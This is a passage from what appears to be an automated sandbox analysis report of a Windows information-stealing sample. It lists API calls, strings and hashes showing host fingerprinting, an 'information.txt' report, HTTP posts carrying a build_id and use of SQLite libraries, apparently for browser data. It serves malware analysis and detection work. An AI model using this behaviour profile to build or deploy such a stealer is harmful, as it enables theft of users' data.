• StrCmpCA.SHLWAPI(?), ref: 00FE5FE8
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6180
• HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00FE61C4
• lstrlenA.KERNEL32(?,",mode,01016928,------,0101691C,a21440e9f7223be06be5f5e2f94969c7,",build_id,01016904,------,010168F8,",010168EC,------), ref: 00FE65EF
• lstrlenA.KERNEL32(?), ref: 00FE65FE
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE6609
• HeapAlloc.KERNEL32(00000000), ref: 00FE6610
• lstrlenA.KERNEL32(?), ref: 00FE661D
• _memmove.LIBCMT ref: 00FE662B
• lstrlenA.KERNEL32(?), ref: 00FE6639
• lstrlenA.KERNEL32(?,?,00000000), ref: 00FE6647
• _memmove.LIBCMT ref: 00FE6654
• lstrlenA.KERNEL32(?,?,00000000), ref: 00FE6669
• HttpSendRequestA.WININET(00000000,?,00000000), ref: 00FE6677
• InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FE66D4
• InternetCloseHandle.WININET(00000000), ref: 00FE66DF
• InternetCloseHandle.WININET(?), ref: 00FE66EB
• InternetCloseHandle.WININET(?), ref: 00FE66F7
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE61F2
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                          • String ID: "$"$"$------$------$------$------$a21440e9f7223be06be5f5e2f94969c7$build_id$mode
                                                                                                                                                                                                                                                          • API String ID: 3702379033-3626711658
                                                                                                                                                                                                                                                          • Opcode ID: 0c60369923cbf35be8dde33bdd8937809b7e43066b1624f0695f7af51e6a5d97
                                                                                                                                                                                                                                                          • Instruction ID: 1fb96129410a69a2cebf87023a8004c197b1d84d6e61999cea6f0689d40b5227
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c60369923cbf35be8dde33bdd8937809b7e43066b1624f0695f7af51e6a5d97
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7022A73290016D9BCF61EB61DC46BDDB775AF04300F4184E2A60977126DAB57F8AAFD0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 513 ff3d63-ff4782 call ff070a call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ee3 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff17f7 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff18a7 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0bc5 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 GetCurrentProcessId call ff246d call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0d53 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1a2a call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1bba call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ea8 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0e76 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1786 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ffe call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0ee3 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff0f51 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1174 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff122a call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff11dd call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff133c call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff13b5 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff16c8 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff1426 call ff07ea call ff07b0 call fe2910 * 2 call ff1426 call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call fe1ced lstrlenA call ff070a call ff7074 call fe2910 * 2 call fe1cce
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF0EE3: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,010155C7,?,?,?), ref: 00FF0EFB
  • Part of subcall function 00FF0EE3: HeapAlloc.KERNEL32(00000000), ref: 00FF0F02
  • Part of subcall function 00FF0EE3: GetLocalTime.KERNEL32(?), ref: 00FF0F0E
  • Part of subcall function 00FF0EE3: wsprintfA.USER32 ref: 00FF0F39
  • Part of subcall function 00FF17F7: _memset.LIBCMT ref: 00FF182A
  • Part of subcall function 00FF17F7: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00FF1849
  • Part of subcall function 00FF17F7: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00FF186E
  • Part of subcall function 00FF17F7: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00FF187A
  • Part of subcall function 00FF17F7: CharToOemA.USER32(?,?), ref: 00FF188E
  • Part of subcall function 00FF18A7: GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
  • Part of subcall function 00FF18A7: _memset.LIBCMT ref: 00FF18F1
  • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
  • Part of subcall function 00FF18A7: lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF0BC5: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00FF0BF8
  • Part of subcall function 00FF0BC5: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF0C38
  • Part of subcall function 00FF0BC5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00FF0C8D
  • Part of subcall function 00FF0BC5: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF0C94
• GetCurrentProcessId.KERNEL32(Path: ,01015864,HWID: ,01015858,GUID: ,0101584C,00000000,MachineID: ,0101583C,00000000,Date: ,01015830,0101582C,11.3,Version: ,010155C7), ref: 00FF3FB8
  • Part of subcall function 00FF246D: OpenProcess.KERNEL32(00000410,00000000,00FF3FC7,00000000,?), ref: 00FF248F
  • Part of subcall function 00FF246D: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00FF24AA
  • Part of subcall function 00FF246D: CloseHandle.KERNEL32(00000000), ref: 00FF24B1
  • Part of subcall function 00FF0D53: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D67
  • Part of subcall function 00FF0D53: HeapAlloc.KERNEL32(00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D6E
  • Part of subcall function 00FF1A2A: __EH_prolog3_catch_GS.LIBCMT ref: 00FF1A31
  • Part of subcall function 00FF1A2A: CoInitializeEx.OLE32(00000000,00000000,0000004C,00FF40D6,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1A42
  • Part of subcall function 00FF1A2A: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1A53
  • Part of subcall function 00FF1A2A: CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1A6D
  • Part of subcall function 00FF1A2A: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1AA3
  • Part of subcall function 00FF1A2A: VariantInit.OLEAUT32(?), ref: 00FF1AFE
  • Part of subcall function 00FF1BBA: __EH_prolog3_catch.LIBCMT ref: 00FF1BC1
  • Part of subcall function 00FF1BBA: CoInitializeEx.OLE32(00000000,00000000,00000030,00FF4144,?,AV: ,010158AC,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1BD0
  • Part of subcall function 00FF1BBA: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1BE1
  • Part of subcall function 00FF1BBA: CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1BFB
  • Part of subcall function 00FF1BBA: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1C31
  • Part of subcall function 00FF1BBA: VariantInit.OLEAUT32(?), ref: 00FF1C80
  • Part of subcall function 00FF0EA8: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE1375), ref: 00FF0EB4
  • Part of subcall function 00FF0EA8: HeapAlloc.KERNEL32(00000000,?,?,?,00FE1375), ref: 00FF0EBB
  • Part of subcall function 00FF0EA8: GetComputerNameA.KERNEL32(00000000,00FE1375), ref: 00FF0ECF
  • Part of subcall function 00FF0E76: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE13A9), ref: 00FF0E82
  • Part of subcall function 00FF0E76: HeapAlloc.KERNEL32(00000000,?,?,?,00FE13A9), ref: 00FF0E89
  • Part of subcall function 00FF0E76: GetUserNameA.ADVAPI32(00000000,00FE13A9), ref: 00FF0E9D
  • Part of subcall function 00FF1786: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00FF1798
  • Part of subcall function 00FF1786: GetDeviceCaps.GDI32(00000000,00000008), ref: 00FF17A3
  • Part of subcall function 00FF1786: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00FF17AE
  • Part of subcall function 00FF1786: ReleaseDC.USER32(00000000,00000000), ref: 00FF17B9
  • Part of subcall function 00FF1786: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC), ref: 00FF17C5
  • Part of subcall function 00FF1786: HeapAlloc.KERNEL32(00000000,?,?,00FF4275,?,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF17CC
  • Part of subcall function 00FF1786: wsprintfA.USER32 ref: 00FF17DE
  • Part of subcall function 00FF0FFE: GetKeyboardLayoutList.USER32(00000000,00000000,010157B7,?,?), ref: 00FF102F
  • Part of subcall function 00FF0FFE: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF103D
  • Part of subcall function 00FF0FFE: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FF104B
  • Part of subcall function 00FF0FFE: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00FF107A
  • Part of subcall function 00FF0FFE: LocalFree.KERNEL32(00000000), ref: 00FF1122
  • Part of subcall function 00FF0F51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FF0F6C
  • Part of subcall function 00FF0F51: HeapAlloc.KERNEL32(00000000), ref: 00FF0F73
  • Part of subcall function 00FF0F51: GetTimeZoneInformation.KERNEL32(?), ref: 00FF0F82
  • Part of subcall function 00FF0F51: wsprintfA.USER32 ref: 00FF0FA0
  • Part of subcall function 00FF1174: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914), ref: 00FF1188
  • Part of subcall function 00FF1174: HeapAlloc.KERNEL32(00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF118F
  • Part of subcall function 00FF1174: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ), ref: 00FF11AD
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: RegQueryValueExA.KERNEL32(01015870,00000000,00000000,00000000,000000FF,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000), ref: 00FF11C9
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1174: RegCloseKey.ADVAPI32(01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF11D2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF122A: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00FF12A0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF122A: wsprintfA.USER32 ref: 00FF12FE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF11DD: GetSystemInfo.KERNEL32(?), ref: 00FF11F7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF11DD: wsprintfA.USER32 ref: 00FF120F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF1354
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: HeapAlloc.KERNEL32(00000000), ref: 00FF135B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00FF1377
                                                                                                                                                                                                                                                            • Part of subcall function 00FF133C: wsprintfA.USER32 ref: 00FF139D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010157BE,?,?), ref: 00FF16F7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: Process32First.KERNEL32(00000000,00000128), ref: 00FF1707
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: Process32Next.KERNEL32(00000000,00000128), ref: 00FF1765
                                                                                                                                                                                                                                                            • Part of subcall function 00FF16C8: CloseHandle.KERNEL32(00000000), ref: 00FF1770
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,010157BB,00000000,?,?), ref: 00FF1496
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00FF14D3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: wsprintfA.USER32 ref: 00FF1500
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00FF151F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00FF1555
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: lstrlenA.KERNEL32(?), ref: 00FF156A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,01015DBC), ref: 00FF15FF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegCloseKey.ADVAPI32(?), ref: 00FF1669
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1426: RegCloseKey.ADVAPI32(?), ref: 00FF1695
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000), ref: 00FF4740
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                           • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                          • String ID: 11.3$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                          • API String ID: 478979899-3951908000
                                                                                                                                                                                                                                                          • Opcode ID: e5403c791d43657832041b6005f4a316331bc35dd48686557decd47e9f5ab88f
                                                                                                                                                                                                                                                          • Instruction ID: 2a4000b7f3a700778dbe5f2fb6f99566760033ca80ec99046594c59401dd1a9f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5403c791d43657832041b6005f4a316331bc35dd48686557decd47e9f5ab88f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25522E32D0015EAADF40FBA5EC429EDB775AF01300F5245A1AA1077137DFB97E4AAAD0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrlenA.KERNEL32(?,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF0772
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrcpyA.KERNEL32(00000000,00000000,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF07A4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: lstrlenA.KERNEL32(?), ref: 00FF6B02
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: StrStrA.SHLWAPI(00000000,?), ref: 00FF6B17
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: lstrlenA.KERNEL32(?), ref: 00FF6B26
                                                                                                                                                                                                                                                            • Part of subcall function 00FF6AA3: lstrlenA.KERNEL32(00000000), ref: 00FF6B3F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6C7D
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6CD6
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6D36
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6D8F
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6DA5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6DBB
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00FF6DCD
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000EA60), ref: 00FF6DDC
                                                                                                                                                                                                                                                          Strings
• sqlo.dll, xrefs: 00FF6EAA
• ERROR, xrefs: 00FF6DB3
• ERROR, xrefs: 00FF6DC5
• ERROR, xrefs: 00FF6D9D
• ERROR, xrefs: 00FF6C75
• ERROR, xrefs: 00FF6CCE
• sqlo.dll, xrefs: 00FF6EDB
• sqlite3.dll, xrefs: 00FF6E79
• sqlite3.dll, xrefs: 00FF6E45
• ERROR, xrefs: 00FF6D87
• ERROR, xrefs: 00FF6D2E
• Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00FF6E8B
• Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00FF6EBC
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcpy$Sleep
